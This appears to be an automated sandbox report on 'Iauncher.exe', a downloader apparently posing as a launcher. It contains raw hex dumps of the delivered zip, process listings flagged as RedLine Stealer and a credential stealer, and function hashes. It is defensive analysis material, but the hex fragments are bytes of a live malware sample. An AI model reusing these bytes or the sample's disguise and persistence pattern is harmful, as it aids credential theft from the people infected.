2024-05-01 18:46:09 UTC	679	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 18:46:09 GMT Content-Type: application/zip Content-Length: 418397 Connection: close Last-Modified: Thu, 25 Apr 2024 15:31:32 GMT ETag: "6625d-616ed7b506247" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DZi%2Fs%2FolZRC7oQh%2F5S1s4QhkPbdRv2wQy7qBSeVUiTHrxgQfuRd6HeTGURsQLL0TonlZ6gSkugFXyuklpcTI5O%2BnEmzF6co9pLnBQFJubfcNTe9ZPWBE5ixl2c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d1eec11db7208e-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 18:46:09 UTC	690	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 a5 93 99 58 7b a5 c2 5b bf 61 06 00 00 b6 07 00 0c 00 00 00 49 61 75 6e 63 68 65 72 2e 65 78 65 e4 fd 7d 7c 54 c5 f5 38 8e df dd bd 49 2e 64 c3 5d 60 81 08 51 22 ac 8a 06 35 b2 a8 89 1b 70 13 d8 24 5a 82 1b 62 76 89 98 c4 aa a4 e9 fa 84 70 2f 0f 4a 20 78 b3 9a 9b f1 2a 6d b5 b5 ad b6 fa b6 b6 fa b6 fd 94 b6 2a f8 bc c9 d2 3c 20 f2 a4 6f c5 a2 36 58 aa 13 37 6a 78 30 d9 40 c8 fd 9d 33 77 77 b3 60 50 fb 79 bf be df 3f be 3f 34 7b ef 9d 39 33 73 e6 cc cc 99 73 ce cc 9c 29 bb 61 33 67 e1 38 8e 87 3f 5d e7 b8 6d 9c f1 cf cd 7d f7 bf 28 fc 8d 9b fe ca 38 ee 85 31 6f 9f bb cd b4 e8 ed 73 af af ff f1 aa ec 15 2b ef fa d1 ca 1f de 91 7d cb 0f ef bc f3 2e 29 fb e6 e5 d9 2b e5 3b b3 7f 7c 67 f6 c2 eb 2a b2 ef b8 eb d6 e5 97 64 64 8c 75 Data Ascii: PKX{[aIauncher.exe}\|T8I.d]`Q"5p$Zbvp/J xm< o6X7jx0@3ww`Py??4{93ss)a3g8?]m}(81os+}.)+;\|g*ddu
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 63 70 7d 0d 64 aa 5e 3e 17 de 9f 9e 05 3f 6a c6 6c f8 a5 cb b0 94 da 9a f0 cb eb f1 eb 99 cb 00 70 25 96 be 80 95 5e 5f 8f ef 57 b2 f7 9d f1 7f 64 a1 83 af 20 1f 00 66 b3 95 5b 78 4e b5 d0 a5 e5 80 90 e4 c8 aa f2 69 6b 6d ea 02 1e 70 fc 3c 03 82 8a 33 c9 22 87 5d 2d c9 24 0b f8 da 1a 55 80 87 5a ca b3 5f 7c 6f 77 5b 39 f6 c8 e0 48 78 59 9b 95 d3 25 87 00 29 04 fa ea 4c 8e 6b a5 d3 c3 58 d4 3c ec f7 2b 05 2f 45 46 54 15 0e 86 24 78 ff d4 8b ef ce 10 83 d0 4a 67 ba 3a c5 fb e7 9c cb 71 e5 74 27 c6 90 ce 60 97 34 56 2b 9c a9 74 77 ab a5 43 e1 9e 0b 7e cd 71 81 d9 f4 cf 18 a9 72 aa 9b 57 dd 42 5d 87 db 6a 32 85 2b c8 8d 0e 6b 25 e9 79 59 d7 f5 8d ae 0f d6 dc 10 10 97 ba f6 af 99 5a 01 d8 d8 d4 6a 5b a5 ea b1 53 3f 20 a4 6c b7 b6 f3 39 5c 64 ae cf 5f ee ad a0 Data Ascii: cp}d^>?jlp%^_Wd f[xNikmp<3"]-$UZ_\|ow[9HxY%)LkX<+/EFT$xJg:qt'`4V+twC~qrWB]j2+k%yYZj[S? l9\d_
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 64 6d 82 e6 7e 84 cf f3 62 8e f0 e9 88 e5 5c 7b 16 32 8d 17 58 6a 22 10 37 ef 55 9b d8 07 c0 14 94 b3 fc 9e c4 fc 6e 37 f2 73 f6 47 ce ff 8e 1c 33 18 64 26 f1 f2 44 40 28 06 0e 2d ba 82 b5 c0 85 c0 4a 19 db be de b1 56 e3 d7 7a 97 94 03 cc 2c 48 f6 5e 66 12 22 92 c3 cb 90 51 6e c9 e6 94 5b 1c 9c b7 dc 17 c7 44 6d 32 2a 78 20 93 21 84 3d 81 8e 07 d9 12 5e e6 d2 4b e0 05 fa d6 ad a4 1d b9 b8 73 27 bd f6 1a 84 5a da 96 6d 30 04 6d b1 8d 1e 3a 0b 99 85 8f 9e 7b 0d e3 15 6c ce 6f 5c 9b c1 c9 53 94 90 cd cb f8 49 db 80 31 d4 65 7e 38 14 31 cf 09 19 83 5a e9 b5 ea b2 8d 71 3d cf 31 6f c0 04 8c 5e f4 87 80 df 0f d5 89 13 21 84 fe 11 a6 a0 3a e2 19 52 b6 db bb c2 3e 3f cb 2a e3 4d 28 cd a4 ad 35 f9 a9 e9 d1 d8 5c 14 ec 97 a6 04 75 69 5c 6c 3a f9 fc 76 36 9d d4 92 Data Ascii: dm~b\{2Xj"7Un7sG3d&D@(-JVz,H^f"Qn[Dm2x !=^Ks'Zm0m:{lo\SI1e~81Zq=1o^!:R>?M(5\ui\l:v6
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 9a 48 ef ce c2 61 0a 3d 23 ff c6 5c ab f8 48 38 62 fe 9b a9 b9 96 47 dd 65 59 12 e6 f3 18 e6 0b 13 f9 8f d6 69 80 84 65 87 bc 74 13 aa a1 9e 43 d0 47 a0 e3 20 e3 fe f5 49 d4 4b 0f d1 7b 6c d8 53 86 48 bb 91 91 f3 ed 1a fa ca d5 f1 de 71 98 2c e6 01 29 41 69 b5 d1 72 ec 65 1b 78 4e b2 82 16 b7 9a a7 f7 5f 6d 88 66 3d 79 10 81 d5 de 60 03 2a ed 87 3c a4 31 fa 6a 90 cf 08 c4 eb ab ed f4 65 7c e9 48 7d 16 62 40 90 1b 03 f9 a5 12 53 c0 a4 db b0 7d fd 3e 3a d9 81 19 cf e6 aa 30 dd 6c da 82 e0 4e 5d dd 30 3b 7f 83 03 83 1c 74 0d 06 a9 1b 1c f9 1b b2 30 20 8b d6 19 01 59 f9 1b ec 18 60 a7 95 46 80 3d 7f 83 d5 28 7d a1 11 60 cd df c0 63 00 4f 9d 46 00 4f 76 d5 d6 f4 5c 8e ea f1 18 62 62 63 4f 88 8f bd 9b 84 b0 56 c8 77 98 b0 cf 78 e9 e5 01 b4 37 91 6b 90 00 e3 71 Data Ascii: Ha=#\H8bGeYietCG IK{lSHq,)AirexN_mf=y`*<1je\|H}b@S}>:0lN]0;t0 Y`F=(}`cOFOv\bbcOVwx7kq
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: c4 8d b1 18 83 2c 8a 0d d5 a4 b6 5f 6c 7a 16 9b de 94 53 f8 ac 80 cf 99 85 c8 49 b5 72 53 45 cb f4 c6 13 8b 24 be f9 ac 48 7a bb e9 9a ba 0e f3 15 73 95 36 33 e9 dc 74 90 03 36 b8 0c 5a 92 c7 d6 dd 72 57 64 32 bc 0b d0 17 52 5a 4a 4c 91 31 a1 6e 4b ff 1e 47 b6 75 69 b3 19 da b5 bd c8 04 12 45 9f 5e c8 1b e4 29 d0 3c 7d 15 3e bf 97 7c 40 1f cc 62 4a f1 bd d0 e9 b7 7b 9f 81 7f f4 df 59 c8 51 02 e9 55 da bd 99 a4 ef e8 33 cc d6 ce 73 9b 7a d1 c6 18 b7 ec 36 39 9a e0 ab a2 12 28 f0 01 bd ef 4f 68 45 d5 a0 4a 5e fa 07 4c 0d 89 21 cf f5 8e fa a3 cf 38 f5 37 90 c3 34 be c6 cc 5d 9c 7a af a0 de 0b 7a b7 5d b6 00 53 37 92 48 59 cc 3e e7 f6 82 88 f3 c8 17 d0 12 0b 30 62 ad d7 5f bf 1d 7b d3 eb 2c c8 a6 19 45 42 e8 4e 0c fd c3 17 a8 c1 cf 52 17 d8 e3 59 4b e7 43 aa Data Ascii: ,_lzSIrSE$Hzs63t6ZrWd2RZJL1nKGuiE^)<}>\|@bJ{YQU3sz69(OhEJ^L!874]zz]S7HY>0b_{,EBNRYKC
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: c6 9f a5 96 d8 48 c7 6a 33 49 f3 69 73 05 50 e3 ac 15 5e 1f bd 62 69 6c 07 c9 39 1c e9 a8 89 4c 84 a1 d0 ee 81 a9 77 37 ae bb 57 d0 a9 54 d7 6b 97 55 1b f2 36 64 6d 3d 35 eb 8b be 91 35 26 83 ec 7d f4 35 ee d4 8c 31 a2 dd 03 b3 df 6e 28 a2 82 ce f9 2c 29 63 e2 11 60 dc 2a dd 53 d4 42 2b b9 c6 e6 9b d9 29 2d 6c 6c b0 72 f2 82 fe 56 5e 4a 7b 23 1b e5 4e 5b 7f ab f9 8d 3c 78 db e6 85 1f 71 61 9f e6 89 06 4c 5e 9a c9 cc c7 5e 1f 0e d2 7f f7 42 77 c8 63 dd e1 90 37 32 a6 06 15 05 b6 e8 9f 53 15 23 ac 8f f4 c5 6c 5f b9 ca 3a bb 48 f6 c2 db 78 7d 85 cd a7 df 6d 5b 42 5f f9 8c 2d 4e 60 07 44 3d 26 fe 47 37 97 1b 6b 0e 50 21 5c e6 43 ca 27 e2 a4 53 e3 04 6c 33 66 53 c9 f9 18 fb 49 4c 8e 01 de 26 c0 38 29 e5 e1 bb 0e 46 7a 18 ca 63 7b 8a 32 3e d7 75 04 c0 22 ef 36 Data Ascii: Hj3IisP^bil9Lw7WTkU6dm=55&}51n(,)c`*SB+)-llrV^J{#N[<xqaL^^Bwc72S#l_:Hx}m[B_-N`D=&G7kP!\C'Sl3fSIL&8)Fzc{2>u"6
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 7d 6e 5e 50 17 9b 1e 86 86 04 39 b0 9b 5e f9 2f 5d 6f 6c 38 c4 49 6b 95 e5 94 63 6a 58 1a 08 9e de b9 ce 7d 01 be 56 89 ea e2 c2 f7 d5 4a 1a 5f 52 ea 4d 5e 52 aa 4d ef 48 2c 29 0d a6 47 fd 64 07 ad 82 8e b8 6d f9 d5 b1 25 25 00 21 50 70 25 4d 68 6e b1 25 a5 68 fa 3a 6b fa 71 3f bd e8 6b d4 0f bb 69 c3 21 a8 72 3b 3d 7b 26 37 a2 c0 91 4a a1 02 65 e8 eb 6c ae 1d 2b 6f 40 51 ba da ca 44 e9 b9 20 4a a7 9d 22 4a e7 ec d0 e6 7a 0b 35 be a6 dc e7 a5 f7 7f 8d 7b b9 65 9b 8f de 69 36 14 78 10 aa 51 a2 8b 49 eb 4b 98 b8 fe fa 3f 0c a9 da ca d1 e7 8f c6 94 05 6c 3c 55 e8 70 f3 5c b7 b1 dc a0 34 58 4d f2 78 52 26 04 26 d5 4b a8 8b 5c f5 4f 5d 8f 4c 00 aa d3 4a 1e 77 a9 e3 76 8d af 41 ac 01 b1 1c 05 f4 6d f5 b1 75 8a 72 52 6e 73 95 db 57 4d 43 c9 59 2b 32 a9 85 36 40 Data Ascii: }n^P9^/]ol8IkcjX}VJ_RM^RMH,)Gdm%%!Pp%Mhn%h:kq?ki!r;={&7Jel+o@QD J"Jz5{ei6xQIK?l<Up\4XMxR&&K\O]LJwvAmurRnsWMCY+26@
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 03 a2 c1 f7 ec e1 35 b5 31 2c d8 be 94 07 8f c3 d8 c4 fc e8 9f 90 b1 9f 87 af 48 96 21 ba e3 38 22 84 5d 97 ee c4 ed dd d5 42 c0 5c 8f cb 1d aa 85 3e 52 07 8f 05 3c d6 5e 3a 07 b4 cf 07 10 e0 5e fe 65 3c 5c 40 fa 3a 16 08 38 36 71 a9 32 62 a5 b7 41 9c 72 8b 80 f0 f4 59 84 03 89 7d 81 15 12 8e f5 d2 c2 5f e2 de a6 05 56 ec d3 8c d7 b2 65 e2 fe c0 6c c8 f3 2f 0b 58 87 a7 d7 e1 38 48 a3 8f e0 a3 84 a7 cb 31 8b 52 c1 19 0a 76 89 8f 84 d4 12 01 26 a1 39 15 34 85 ed 40 77 86 ea f2 f9 55 0d 99 e4 3d d2 de fa b9 45 e9 4e 13 5f 5a 74 95 55 7c be d5 19 6a 86 97 62 d0 ea 01 b5 f5 1f 2c c3 1d 69 06 1d 88 c7 0e c3 c1 e7 ec cf 5f 21 48 93 ea 88 c7 fa 8a 8e 66 59 57 db 9a 9c 66 93 33 e4 8e cc d1 2a 87 a0 f7 2f f1 c1 34 59 1e 30 69 65 56 60 c2 b9 fa 24 c1 0d bc 20 24 a5 Data Ascii: 51,H!8"]B\>R<^:^e<\@:86q2bArY}_Vel/X8H1Rv&94@wU=EN_ZtU\|jb,i_!HfYWf3*/4Y0ieV`$ $
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 3e fa c5 f8 ff 4d 35 b6 db 46 aa 01 e5 3d 39 fe db ab 01 fc 5e 19 14 57 17 35 ce f3 be 0a 22 8f 94 0f 33 b4 1d 64 3d db 02 94 41 8a 2d 03 96 7f 6a 25 82 a5 55 e9 8e 92 3d a4 d3 d5 07 7a 7d 9f eb 1f 6b cc e4 ad 72 dc e5 fa 13 66 71 b1 d5 d6 18 92 8b d2 3b 2b d9 1c 0c 43 4d b9 17 74 fd 1b 1a ef 9d cf 49 d7 13 cb 9b c8 29 fd 64 85 35 c1 b8 de d2 df ab 73 45 a5 95 e4 de 3c 94 85 b3 35 cf 7e dc a3 48 76 79 71 ab b3 b6 c0 ed 1d e1 70 ce ae 9c 56 69 3a 0a 03 67 a3 30 20 cf 6b fe c1 fc 2d 26 e0 ee b5 35 ce b7 97 d1 36 1b 6e 33 80 30 22 ef 87 c4 39 7d d2 44 7d d5 22 1f 2e 84 fe e4 19 86 a6 ab 4f 1e 83 a8 80 c8 14 e9 9c 13 8a 6c 47 be c8 6c ef 68 77 5a 63 23 ed 39 61 e0 91 2e 8f 75 a5 05 78 05 ae e0 42 7d 45 cd 7e 56 4e 1f d9 65 69 cb 79 ab b0 dc bb 84 3e 31 97 c9 Data Ascii: >M5F=9^W5"3d=A-j%U=z}krfq;+CMtI)d5sE<5~HvyqpVi:g0 k-&56n30"9}D}".OlGlhwZc#9a.uxB}E~VNeiy>1
2024-05-01 18:46:09 UTC	1369	IN	Data Raw: 6f 2f 99 6f ca f7 ec 14 9b 6e d2 19 d5 7b 96 c1 93 e9 32 31 6b d7 29 04 42 fe 84 24 39 1f b8 53 be b0 6a 3a 10 4c 4a ad cb bf 7b 18 98 40 c9 6c 9f 0e 7a 76 96 c2 0d d3 f5 c3 48 41 0f 23 4c 01 02 5d a9 6c cc e3 e4 69 80 87 e6 19 86 2a 0f 7b 29 17 c7 37 a5 0e 74 e4 b3 20 a5 76 5d 41 be 20 59 eb d4 cb 80 96 ef 82 10 1d f9 77 1d 9e 5b 5f 16 37 d3 c6 18 a7 3f 4b 2b 29 c8 37 cb 53 95 06 bb 49 b6 b3 ac c7 21 93 a8 b6 29 ed c3 ca 3b 3a 6e 3e b0 41 00 2b bf 8e fe 65 40 d7 a1 9c 6a d2 9e 1e 96 53 31 91 64 d7 65 7b 85 0f d0 a1 6d bf 62 24 81 06 9b 87 2c 0b 83 e6 ff 22 66 84 ca 01 3c 2e 38 6e f4 c6 35 6e b2 71 21 29 8b 92 ca 21 e5 26 81 53 6e b2 72 6c 33 9f ba c2 a6 ae b5 47 a6 a2 6d 4a d0 95 52 5e 8f 47 2b 37 d9 e0 cf ce b1 0a d8 b1 02 23 30 ce 2e b5 54 50 4b ad 6a Data Ascii: o/on{21k)B$9Sj:LJ{@lzvHA#L]li*{)7t v]A Yw[_7?K+)7SI!);:n>A+e@jS1de{mb$,"f<.8n5nq!)!&Snrl3GmJR^G+7#0.TPKj

Target ID:	0
Start time:	20:45:58
Start date:	01/05/2024
Path:	C:\Users\user\Desktop\Iauncher.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Iauncher.exe"
Imagebase:	0x480000
File size:	732'672 bytes
MD5 hash:	E69FEB7FD40F408A088D879BE323F37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1618643197.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	20:46:08
Start date:	01/05/2024
Path:	C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
Imagebase:	0xf10000
File size:	505'344 bytes
MD5 hash:	D79977A15EB010C637CF9078B4EB82C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:46:08
Start date:	01/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:46:08
Start date:	01/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x460000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.2%
Total number of Nodes:	668
Total number of Limit Nodes:	49

Executed Functions

Function 09F1531C Relevance: 8.0, Strings: 6, Instructions: 494
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 09F16A75
d, xrefs: 09F16AF4
d, xrefs: 09F16C17
d, xrefs: 09F16B8E
d, xrefs: 09F16A64
d, xrefs: 09F169DA

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID: d$d$d$d$d$d
API String ID: 0-3846220497
Opcode ID: 8f25caf442275b79e280f87d51c77f78de571640d86ef470c54f7a09c428c610
Instruction ID: e94b0983b725005ad796b28586291603f56222b0dce29261160179f517d01bd0
Opcode Fuzzy Hash: 8f25caf442275b79e280f87d51c77f78de571640d86ef470c54f7a09c428c610
Instruction Fuzzy Hash: 2922D535900A29DFDF12CF54CC58ADABBB2FF4A306F0581D5E909AB260D7729A95CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05CC009F Relevance: 7.0, Instructions: 6991
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d1cb694af0ee8de920636ff2d1732608e1252d346c30e244979300e422db33
Instruction ID: 9fe405e954a1cca2c811c4323f2d78c88fc21bdbcd63352677b0f7b7c297a61c
Opcode Fuzzy Hash: 97d1cb694af0ee8de920636ff2d1732608e1252d346c30e244979300e422db33
Instruction Fuzzy Hash: 20047078905229CFCB25DF64C8889D9BBB1FF49305F1495EAE909A7361DB31AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05CBA520 Relevance: 6.9, Strings: 5, Instructions: 620
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05CBB1F9
Hbq, xrefs: 05CBB45B
Hbq, xrefs: 05CBB28C
Hbq, xrefs: 05CBB39D
Hbq, xrefs: 05CBB313

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: a3567d27c0dc65b70050f1a620152d3599421530bcf0eec4651182f0e09b7158
Instruction ID: 14e8b49b8b2d8430f1b9bcd607b5d3feb578b59fceae4c2fc7ca49d7c5bb843f
Opcode Fuzzy Hash: a3567d27c0dc65b70050f1a620152d3599421530bcf0eec4651182f0e09b7158
Instruction Fuzzy Hash: DC327D70E002188FEB54DFA9C8907AEBBF2BF84300F14856AD549AB395DF749E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04E0A080 Relevance: 3.0, Strings: 2, Instructions: 521
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 04E0A3E0
pbq, xrefs: 04E0A4A3

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID: 4'^q$pbq
API String ID: 0-3872760177
Opcode ID: ffe10bc3e2cc97a2c675133d83b4d37d323ba961dcf6e55d88dec30a3dea1878
Instruction ID: a3c7ad92a48597304da340b3fb00c60ac575de76a4591dc877be12c40e9eca42
Opcode Fuzzy Hash: ffe10bc3e2cc97a2c675133d83b4d37d323ba961dcf6e55d88dec30a3dea1878
Instruction Fuzzy Hash: 9632CF75A00218DFDB15CFA8C984F99BBB2FF49304F1580E9E509AB261DB31AE91DF50

Uniqueness

Uniqueness Score: -1.00%

Function 09F16EAF Relevance: 1.0, Instructions: 969COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf283de63935a38d7ea067ae8b2da9a67f1b2aa52cf77d422d4b5e0a2399a139
Instruction ID: c7b408e8396e5386babf7a432080a5835617518a3dde3e07427f4f96a7b4dc60
Opcode Fuzzy Hash: cf283de63935a38d7ea067ae8b2da9a67f1b2aa52cf77d422d4b5e0a2399a139
Instruction Fuzzy Hash: 35A2D075900A29CFCB21DF64CC94B9ABBB2FF49301F0591E9E508AB261DB319E94DF44

Uniqueness

Uniqueness Score: -1.00%

Function 09F153C4 Relevance: .9, Instructions: 928COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f366a0a00589d3648c79a4ee170bd3c80911ab2cce2ccd83b95cd096d96a0eda
Instruction ID: cee8bb2e652d6404f3d8926628fae6a0d7a3ff54409c13304f7b45d0dcc2e579
Opcode Fuzzy Hash: f366a0a00589d3648c79a4ee170bd3c80911ab2cce2ccd83b95cd096d96a0eda
Instruction Fuzzy Hash: 7292D1359116289FCB26EF64C854BD9BBB6BF4A300F0191E9E50C6B261DB71ABC4DF40

Uniqueness

Uniqueness Score: -1.00%

Function 09F16780 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc6b9a6514a6d5c7dd711f8987fab13207a7c6320eb802d395034f4aab3c43f
Instruction ID: 26212aeca051e37f5f6421421644af62d1426cc373496163948cfa92094c6988
Opcode Fuzzy Hash: 6fc6b9a6514a6d5c7dd711f8987fab13207a7c6320eb802d395034f4aab3c43f
Instruction Fuzzy Hash: A882E335D00A298FCB22DF64CC54BDABBB2FF49301F0591E9E508AB261DB719A95CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04E0BDD0 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a5cfd5ab088d3470ff6a70b6fd6a20b715c11528a61890d7ce4375a20f191b
Instruction ID: 5a4760b153a75306ce053d08b739cb29e1f6492d9e6105b633c3327e0c0244a4
Opcode Fuzzy Hash: 04a5cfd5ab088d3470ff6a70b6fd6a20b715c11528a61890d7ce4375a20f191b
Instruction Fuzzy Hash: 0932C674E01219CFDB64CF69D994B9EBBB2FB88301F1091A9E819A7394DB345E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 09F1F1B8 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3eab052daf4638dbebdb42c5f50043018c0d46fa3e1111766734e68ce1ef981
Instruction ID: cd9fbd834144523c6479f3261eab8d43fd207503c079d78be893dcf286760cee
Opcode Fuzzy Hash: b3eab052daf4638dbebdb42c5f50043018c0d46fa3e1111766734e68ce1ef981
Instruction Fuzzy Hash: B0121574E14129CBDB14DFA5C994BAEBBB1FB49340F1094A6E80AB7395D7309D81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07926ED0 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe101dc199cdc81b74abd78df8e712cfbc088c916e7092db1cc8c61649fa186f
Instruction ID: a36594988089561eb60c6ba53d0b9b54da151ff9f4e220f57bdf95e6433eac77
Opcode Fuzzy Hash: fe101dc199cdc81b74abd78df8e712cfbc088c916e7092db1cc8c61649fa186f
Instruction Fuzzy Hash: D0221675C00219DFCF11EFA4D854AEDBBB5FF59300F1096AAE509AB260EB309A95DF40

Uniqueness

Uniqueness Score: -1.00%

Function 09F19348 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be04a3e0cd2699638846345bedc0d381729e9cef726f7ac8d93758aa43c54d88
Instruction ID: 5609fea3457db5e841e53e1a359f02f7b86b5d9655905a06481b1a24b41b4783
Opcode Fuzzy Hash: be04a3e0cd2699638846345bedc0d381729e9cef726f7ac8d93758aa43c54d88
Instruction Fuzzy Hash: 46120535901628DFDB26DF64C848AD9BBB6FF46300F0591E9E50CAB261DB71AB94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 09F15490 Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49d0258f9db37e1cdd5fef3774d7f63c3a1bf107ccbaa37394c3c5cdc50eb35a
Instruction ID: 61cb64da7f519247b716cdd2b76e2dc55430a4a8d6bc5358621f73cb35fba9eb
